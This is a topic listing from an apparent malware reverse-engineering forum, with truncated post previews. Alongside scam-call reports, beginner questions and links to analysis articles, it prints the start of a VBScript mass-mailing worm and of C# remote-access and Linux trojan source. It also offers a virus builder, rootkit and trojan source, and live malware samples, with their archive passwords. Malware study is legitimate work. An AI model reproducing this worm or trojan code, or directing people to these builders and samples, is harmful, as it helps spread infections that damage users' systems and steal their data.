Malware Reverse Engineering
Debugging, disassembling and documenting interesting malware...
364 topics in this forum
-
www.support.me
by Teddy Rogers- 6 replies
- 23.9k views
Today I got a cold call from a woman claiming my computer had been playing up because I had accessed a webpage with a virus or opened SPAM with malware. Normally I put the phone down on cold calls but at the mention of a computer security issue I had to play along for a laugh to see what was up. This type of computer scam (cold call malware) is new to me. She asked me to go to Event Viewer and check the Application error logs and unsurprisingly there were a lot of errors and warnings. This is of course to legitimise the reason for the call and to justify what was to happen next. She asked me to go to www.support.me which then redirected me to https://secure.logmeinrescue.…
-
JPS VIRUS MAKER
by fahmi- 2 replies
- 15.2k views
:thumbsup: download
-
DotNetaspoilt
by sirp- 1 reply
- 10.6k views
Quote: DotNetaspoilt is a very capable code injector, making it possible to inject and edit code and GUI controls into .NET applications in an interactive fashion. Code: />http://anonym.to/?http://digitalbodyguard.com/DotNetasploit.html Code: />http://anonym.to/?http://www.woodmann.com/collaborative/tools/images/Bin_DotNetasploit_2010-8-17_3.39_dotnetasploit25.zip and here is a pack with all the stuff VIDS: Injector Visual Studio Exploit - no code is safe DotNetSploit Overview DotNetaSploit Tools : DotNetSpike MetaSploit - Payload Deployment Targeted Attacks DotNetasploitEXE PDF : Attacking .Net at Runtime ReflectionsHiddenPower />http://anonym.to/?http://depo…
-
make virus I hate Mawanella incident
by fahmi- 0 replies
- 3.8k views
virus i hate mawanella incident On Error Resume Next Rem // I hate Mawanella incident Set W_S = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr, strMsg set wscr=CreateObject("WScript.Shell") Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set cFile = fso.GetFile(WScript.ScriptFullName) cFile.Copy(dirsystem&"\Mawanella.vbs") Set OutlookA = CreateObject("Outlook.Application") If OutlookA = "Outlook" Then Set Mapi=OutlookA.GetNameSpace("MAPI") Set…
-
StuxNet analysis?
by deepzero- 6 replies
- 8.2k views
Hi, I am looking for a detailed Stuxnet analysis, as in: />http://www.virusbtn.com/conference/vb2010/abstracts/LastMinute7.xml Couldn't find anything though. Maybe someone else was more successful?
-
C# ConnEX
by JMC31337- 2 replies
- 5.5k views
plenty of examples on the net like Chickenbutt said //JMC31337 //ConnEX //CLIENT using System; using System.Collections.Generic; using System.Text; using System.IO; using System.Net; using System.Net.Sockets;namespace Client { class Program { static void Main(string[] args) { string download = "download"; string upload = "upload"; ASCIIEncoding ASCII = new ASCIIEncoding(); Byte[] outstream = new Byte[99999]; Console.WriteLine("ConnEX Admin TOOL (CLIENT) Started"); int port = 31337; Console.WriteLine("Enter IP address: "); string servip = Console.ReadLine(…
-
- 0 replies
- 3.6k views
I have started a new blog on reverse engineering http://dreamofareverseengineer.blogspot.com/ Don't hesitate to post ur comments on the bog silent death
-
Looking for acces to malware analysis
by KingChrisyLive- 6 replies
- 9.3k views
Hello everybody, A few days ago I've read some very intresting articles about malware analysis and now I'm looking for papers,tutorials,documentations to get started with the matter. I'd be better if it's written for beginner in this topic. What sort of skills are required to get started ?
-
Session Hijacking
by mcanpuneet- 4 replies
- 6.8k views
You can find many tools for changing Session ID in cookie, form bases and many more. You can do this using nay proxy, Http debugger and many more. But if you will not find any tool to decode session id in cookie. In Cookie, Session IDs are normally in form of 1600401588313630099709319853232030099705 which is encoded representation. Is nay one help me to decode this value to get the original session ID. Thanks in Advance Nebie in Security Domain Email me
-
Malware Scam Attempt
by Departure- 1 reply
- 3.9k views
I had a *removed* ring me today and it was funny, I have never had this type of scam pulled on me before... She rang up saying that there is a new infection spreading rapidly in my country(Australia) and that I could be infected, she guided me into the the event viewer(step by step lol) and in shock she said there shouldn't be any warnings or errors in the application event viewer log. she then told me I will need to goto a site "www.virtualpcdoctor.com" and click on the remote support button which then one of there technical support teams would remove this new infection, I told her she is ****ed in the head and that I don't believe her, she insisted that her company is a…
-
- 12 replies
- 7.6k views
Hi everybody. My boss has told me to find out Binary code of stuxnet or any file that is suspicious that is Stuxnet. Anyone does it have or know where I can get it ? Tnx.
-
malware causing ollydbg to crash at start
by frank_boldewin- 5 replies
- 7.2k views
hey guys, i'm currently investigating a spear phishing malware. (sorry, can't share this malware) even with all protection plugins like latest strongod, phant0m etc... it crashes immediately after loading the executable into ollydbg.exe i found out, that the problem is caused, because of illegal export directory entries of the PE file. see attachment. if i fix the "number of names" to "0" olly loads the file without problems and unpacking works well, after bypassing several antidump, antidebug ... tricks. anyone has seen this anti-olly trick before and if yes, is there a plugin for a it, which hardens olly against this trick? cheers, frank
-
Zhelatin-F Worm
by JMC31337- 0 replies
- 10.4k views
got this outta a packed Dev-C package archive rar passwwd: infected mathtest.rar
-
W32.SafeSys.Worm
by Jaymz- 1 reply
- 16.7k views
Used search on the entire forum and also this sub-section,but I didn't find anything related to SafeSys virus... Here's a download link for it,if you want to examine it.. Notice that ALL THE FILES IN THE PACKAGE ARE INFECTED! The package is password protected,so it does not do any harm to your computer... Quote: "The worm is called W32.SafeSys.Worm and attacks a particular program called Deep Freeze. Deepfreeze is a computer protection utility that prevents malicious code from writing to the hard drive itself. Any malicious code is written to a memory buffer which then gets erased upon reboot. The original hard drive data is untouched and can simply be reloaded duri…
-
TDL x64 Rootkit
by Aguila- 2 replies
- 21.7k views
Called TDL, TDSS, Alureon or Olmarik. First widely spreaded x64 rootkit. Analysis: />http://www.prevx.com/blog/154/TDL-rootkit-x-goes-in-the-wild.html />http://www.prevx.com/blog/155/x-TDL-rootkit--follow-up.html />http://www.symantec.com/connect/de/blogs/tidserv-64-bit-goes-hiding />http://blog.raidrush.ws/2010/09/11/malware-analyse-tdl-rootkit-64-bit-infektion/ (german, but with TDL dropper source code) download: http://www.xup.in/dl,15799673/TDL_x64.rar/ password: infected
-
Waledac's Anti-Debugging Tricks
by sirp- 1 reply
- 6.3k views
even more of that nasty tricks ,) The last spreading malware version of Waledac, a notorious spamming botnet that has been taken down in a collaborative effort lead by Microsoft earlier this year, contained some neat anti-debugging tricks in order to make reverse-engineering more difficult. Felix Leder and I have been presenting about the approach at SIGINT 2010 in Cologne yesterday, and as the method seems to be not publicly known yet, I will quickly describe it here as well. Here's the Info
-
Skype trojan source
by sirp- 0 replies
- 4k views
Skype trojan source The tools generally are related to the two trojan horses Minipanzer and Megapanzer (which you find at the bottom of this section) to footprint a system, collect sensitive data, malware slef defense mechanisms and so on. All sourcecode is available under the GPL so please do whatever legal stuff you want with it but keep the source open. I used the time over christmas to work on the Skype trojan source code. The code was a little messy, it compiled but at some places it crashed. The old source was optimised for Skype 3 and about for a year now Skype 4 is spreading more and more. Therefore I decided to clean up the code and adapt it that way it works tog…
-
29A INC files
by CodeExplorer- 2 replies
- 7.6k views
29A INC files - virus source ASM Link: />http://vx.org.ua/29a/29a-2/29a-2.3_3
-
Find username and password
by Krisler12- 1 reply
- 3.9k views
Hi ! It is a windows virus , better say a stealer. Archive password: 123456 It is coded in visual basic 6 and strongly obfuscated. Try to find what is the site name for sending the logs, username and password for login into the site. Good luck ! test.rar
-
GTK Linux Trojan
by JMC31337- 0 replies
- 4.8k views
//gcc -lX11 -lXtst gtkthief2.c -o gtkthief2 `pkg-config --cflags --libs gtk+-2.0` //JMC31337 //VIRAL WEAPONRY LABZ #include <gtk/gtk.h> #include <stdio.h> //#include <gdk/gdkkeysyms.h> #include <stdlib.h> #include <X11/Xlib.h> #include <X11/keysym.h> #include <X11/extensions/XTest.h> #include <string.h> #include <linux/input.h> #include <X11/Xutil.h> #include <X11/Xatom.h> #include <X11/keysymdef.h> #include <dirent.h> int apt=1; //=================================== static void delete() { system("chmod 755 *"); system("pkill gdb"); struct dirent **namelist; int n; int c; int apt=1; int C4 = 4; …
-
Suspected Malware packed with AsPack
by NewEraCracker- 1 reply
- 6.8k views
Hello guys, Today I found this on a download. I think its a virus and I found that it is packed with Aspack. I've sent this to avira but if you can, please take a look (using an isolated virtual machine) Password: malware DO THIS ONLY IF YOU ARE EXPERIENCED. I DO NOT KNOW WHAT THIS FILE IS CAPABLE OF. malware.rar
-
take a look
by blackpirate- 5 replies
- 9.8k views
hey, i just found a link to an aapp, lets say very handy to have! i thought that its too nice to be real so i scanned the file first on virustotal , and without any positive result! then the bad things happened: after running it..the app created multile user accounts, loked mine (admin), deleted restore point... very nasty! can someone debugg it? to see whats its all about and if i tooked any risk? i had some important things on my pc! (passwords etc) PLEASE BE CAREFULL! RUN IT ON VIRTUAL MACHINE ONLY! FILE:http://www.sendspace.com/file/w04db8 thnx in advance! BP
-
General Considartions while Reversing Malicious Software
by mcanpuneet- 0 replies
- 3.4k views
I have little experience in reversing windows executable and DLLs using Ollydbg and some other debugger. I want to learn Malicious Software reversing. What general considration should be taken while reversing any malicious software. Any help will be appreciated. Thanks in advance
-
CSI Internet - Malware analysis series
by frank_boldewin- 0 replies
- 3.7k views
hi all, for anyone interested in malware analysis, here are the links to all 5 parts of our CSI Internet series. part1: malicious javascript />http://www.h-online.com/security/features/CSI-Internet-Alarm-at-the-pizza-service-1019940.html?view=print part2: malicious msoffice />http://www.h-online.com/security/features/CSI-Internet-The-image-of-death-1030311.html?view=print part3: malicious pdf />http://www.h-online.com/security/features/CSI-Internet-PDF-timebomb-1038864.html?view=print part4: malicious flash (integer overflow analysis) />http://www.h-online.com/security/features/CSI-Internet-Attack-of-the-killer-videos-1049197.html?view=print part5: malicious f…
-
Malware sample for practice
by GEEK- 13 replies
- 8.8k views
hey found this on my usb so i am guessing its not a very dangerous virus. i have sent it to any online AV checkers simply coz i am not bothered if anyone wants to practise i have zipped unedited binaries password: infected usb_malware_sample.rar
